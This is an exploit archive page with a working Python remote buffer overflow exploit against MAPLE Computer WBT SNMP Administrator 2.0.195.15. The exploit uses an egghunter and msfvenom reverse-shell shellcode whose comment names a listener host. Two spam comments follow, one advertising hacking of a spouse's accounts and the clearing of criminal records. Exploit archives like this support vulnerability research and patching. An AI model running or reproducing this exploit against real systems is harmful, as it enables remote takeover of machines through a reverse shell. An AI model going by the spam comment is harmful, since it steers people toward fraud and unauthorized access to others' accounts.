what you don't know can hurt you

MAPLE Computer WBT SNMP Administrator 2.0.195.15 Buffer Overflow

MAPLE Computer WBT SNMP Administrator 2.0.195.15 Buffer Overflow
Posted Jul 19, 2019
Authored by hyp3rlinx, sasaga92

MAPLE Computer WBT SNMP Administrator version 2.0.195.15 remote buffer overflow exploit with egghunter.

tags | exploit, remote, overflow
MD5 | 264d4bba8bff62a4e99bb6090af82f9b

MAPLE Computer WBT SNMP Administrator 2.0.195.15 Buffer Overflow

Change Mirror Download
# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)
# Author: sasaga92
# Discovery Date: 2019-07-18
# Vendor Homepage: www.computerlab.com
# Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager
# Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
# Tested on OS: Windows XP SP2 x86
# CVE: N/A
# [+] Credits: John Page (aka hyp3rlinx)


#!/usr/bin/python

import sys
import socket
import random
import string
import struct



def pattern_create(_type,_length):
_type = _type.split(" ")

if _type[0] == "trash":
return _type[1] * _length
elif _type[0] == "random":
return ''.join(random.choice(string.lowercase) for i in range(_length))
elif _type[0] == "pattern":
_pattern = ''
_parts = ['A', 'a', '0']
while len(_pattern) != _length:
_pattern += _parts[len(_pattern) % 3]
if len(_pattern) % 3 == 0:
_parts[2] = chr(ord(_parts[2]) + 1)
if _parts[2] > '9':
_parts[2] = '0'
_parts[1] = chr(ord(_parts[1]) + 1)
if _parts[1] > 'z':
_parts[1] = 'a'
_parts[0] = chr(ord(_parts[0]) + 1)
if _parts[0] > 'Z':
_parts[0] = 'A'
return _pattern
else:
return "Not Found"

def pwned(_host, _port, _payload):
print "[*] Conectandose a {0}:{1}...".format(_host, _port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((_host, _port))
print "[*] Conectado, Enviando payload {0} bytes...".format(len(_payload))
_payload = "{0}\r\n\r\n".format(_payload)
s.send(_payload)
_data = s.recv(1024)
s.shutdown
s.close
print 'Recibido:', repr(_data)
print "[+] Payload de {0} bytes Enviado, Satisfactoriamente su payload ejecutado.".format(len(_payload))


def main():

_host = "192.168.0.12"
_port = 987
_offset_eip = 642200
_padding = 642144
_eip = "\xc3\x78\xd7\x5a" #call ebx 0x5AD778C3
_tag = "w00tw00t"

#msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.11 LPORT=443 -e x86/alpha_mixed -f c
_shellcode = ("\x89\xe6\xda\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x39\x6c\x39\x78\x6c\x42\x53\x30\x73\x30\x35\x50\x35\x30\x4d"
"\x59\x78\x65\x30\x31\x4b\x70\x51\x74\x6e\x6b\x36\x30\x54\x70"
"\x4e\x6b\x33\x62\x74\x4c\x4e\x6b\x30\x52\x52\x34\x4c\x4b\x44"
"\x32\x45\x78\x46\x6f\x6c\x77\x33\x7a\x31\x36\x64\x71\x6b\x4f"
"\x6e\x4c\x65\x6c\x30\x61\x73\x4c\x74\x42\x46\x4c\x67\x50\x59"
"\x51\x68\x4f\x36\x6d\x76\x61\x7a\x67\x59\x72\x4c\x32\x51\x42"
"\x32\x77\x4e\x6b\x33\x62\x36\x70\x6e\x6b\x52\x6a\x47\x4c\x4e"
"\x6b\x42\x6c\x76\x71\x61\x68\x5a\x43\x52\x68\x33\x31\x58\x51"
"\x63\x61\x6c\x4b\x52\x79\x45\x70\x57\x71\x79\x43\x4c\x4b\x53"
"\x79\x62\x38\x4b\x53\x44\x7a\x37\x39\x4c\x4b\x66\x54\x4c\x4b"
"\x47\x71\x38\x56\x76\x51\x49\x6f\x6e\x4c\x7a\x61\x78\x4f\x34"
"\x4d\x76\x61\x5a\x67\x56\x58\x79\x70\x33\x45\x49\x66\x66\x63"
"\x51\x6d\x69\x68\x65\x6b\x73\x4d\x66\x44\x64\x35\x5a\x44\x50"
"\x58\x4e\x6b\x30\x58\x37\x54\x47\x71\x59\x43\x63\x56\x6e\x6b"
"\x44\x4c\x50\x4b\x4c\x4b\x46\x38\x75\x4c\x43\x31\x69\x43\x4e"
"\x6b\x44\x44\x6c\x4b\x45\x51\x38\x50\x4d\x59\x57\x34\x36\x44"
"\x51\x34\x51\x4b\x53\x6b\x33\x51\x71\x49\x53\x6a\x76\x31\x6b"
"\x4f\x69\x70\x61\x4f\x63\x6f\x53\x6a\x6e\x6b\x62\x32\x58\x6b"
"\x6e\x6d\x61\x4d\x75\x38\x55\x63\x37\x42\x53\x30\x77\x70\x52"
"\x48\x54\x37\x74\x33\x57\x42\x71\x4f\x32\x74\x50\x68\x62\x6c"
"\x51\x67\x36\x46\x56\x67\x6e\x69\x59\x78\x6b\x4f\x4e\x30\x6e"
"\x58\x4e\x70\x73\x31\x55\x50\x53\x30\x56\x49\x48\x44\x53\x64"
"\x66\x30\x45\x38\x76\x49\x6f\x70\x32\x4b\x33\x30\x79\x6f\x4e"
"\x35\x43\x5a\x57\x7a\x31\x78\x6b\x70\x4f\x58\x75\x50\x76\x6b"
"\x33\x58\x75\x52\x65\x50\x43\x31\x6d\x6b\x6c\x49\x48\x66\x72"
"\x70\x76\x30\x76\x30\x66\x30\x43\x70\x46\x30\x61\x50\x72\x70"
"\x32\x48\x6b\x5a\x56\x6f\x69\x4f\x4b\x50\x69\x6f\x48\x55\x7a"
"\x37\x43\x5a\x56\x70\x31\x46\x36\x37\x43\x58\x6e\x79\x6e\x45"
"\x42\x54\x51\x71\x4b\x4f\x39\x45\x4e\x65\x4b\x70\x43\x44\x46"
"\x6a\x39\x6f\x70\x4e\x45\x58\x50\x75\x38\x6c\x49\x78\x33\x57"
"\x35\x50\x35\x50\x73\x30\x32\x4a\x45\x50\x71\x7a\x64\x44\x31"
"\x46\x50\x57\x42\x48\x64\x42\x78\x59\x4a\x68\x73\x6f\x49\x6f"
"\x49\x45\x4d\x53\x48\x78\x73\x30\x71\x6e\x77\x46\x6e\x6b\x75"
"\x66\x73\x5a\x57\x30\x73\x58\x67\x70\x34\x50\x47\x70\x47\x70"
"\x46\x36\x70\x6a\x37\x70\x50\x68\x51\x48\x69\x34\x76\x33\x78"
"\x65\x39\x6f\x79\x45\x5a\x33\x76\x33\x51\x7a\x55\x50\x66\x36"
"\x71\x43\x52\x77\x31\x78\x56\x62\x78\x59\x6f\x38\x53\x6f\x49"
"\x6f\x79\x45\x4e\x63\x58\x78\x45\x50\x71\x6d\x64\x68\x70\x58"
"\x61\x78\x33\x30\x51\x50\x43\x30\x47\x70\x53\x5a\x53\x30\x70"
"\x50\x51\x78\x64\x4b\x36\x4f\x44\x4f\x50\x30\x69\x6f\x58\x55"
"\x31\x47\x31\x78\x54\x35\x52\x4e\x62\x6d\x35\x31\x49\x6f\x7a"
"\x75\x31\x4e\x51\x4e\x4b\x4f\x64\x4c\x46\x44\x76\x6f\x6e\x65"
"\x54\x30\x59\x6f\x79\x6f\x4b\x4f\x6b\x59\x4f\x6b\x69\x6f\x79"
"\x6f\x39\x6f\x37\x71\x48\x43\x51\x39\x4f\x36\x74\x35\x6f\x31"
"\x58\x43\x4f\x4b\x78\x70\x58\x35\x6e\x42\x43\x66\x70\x6a\x37"
"\x70\x73\x63\x69\x6f\x59\x45\x41\x41")

_egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

_inject = pattern_create("trash A", _padding-len(_tag)-len(_shellcode))
_inject += _tag
_inject += _shellcode
_inject += _egghunter
_inject += pattern_create("trash B", _offset_eip-len(_inject))
_inject += _eip

print(_inject)
pwned(_host,_port,_inject)

if __name__ == "__main__":
main()

Comments (2)

RSS Feed Subscribe to this comment feed
felishiagreen

Do you need to increase your credit score?
Do you intend to upgrade your school grade?
Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
Do you need any information concerning any database.
Do you need to retrieve deleted files?
Do you need to clear your criminal records or DMV?
Do you want to remove any site or link from any blog?
you should contact this hacker, he is reliable and good at the hack jobs..
contact : hackerkelvinmckinnon14489 AT GMAIL DOT COM

Comment by felishiagreen
2019-07-20 00:00:07 UTC | Permalink | Reply
fredluis721

I have been studying your entries all the way through my morning holiday, and I should admit the entire article has been very enlightening and very well written. I assumed I’d mean you can understand that for a few reason this blog does not view smartly in Internet Explorer 8. I want Microsoft might prevent converting their software. I’ve a question for you. Might you mind changing weblog roll hyperlinks? That may be in reality neat! www.jacksonvilletileinstallation.com

Comment by fredluis721
2019-07-24 09:09:04 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    11 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    2 Files
  • 19
    Aug 19th
    18 Files
  • 20
    Aug 20th
    19 Files
  • 21
    Aug 21st
    17 Files
  • 22
    Aug 22nd
    9 Files
  • 23
    Aug 23rd
    3 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close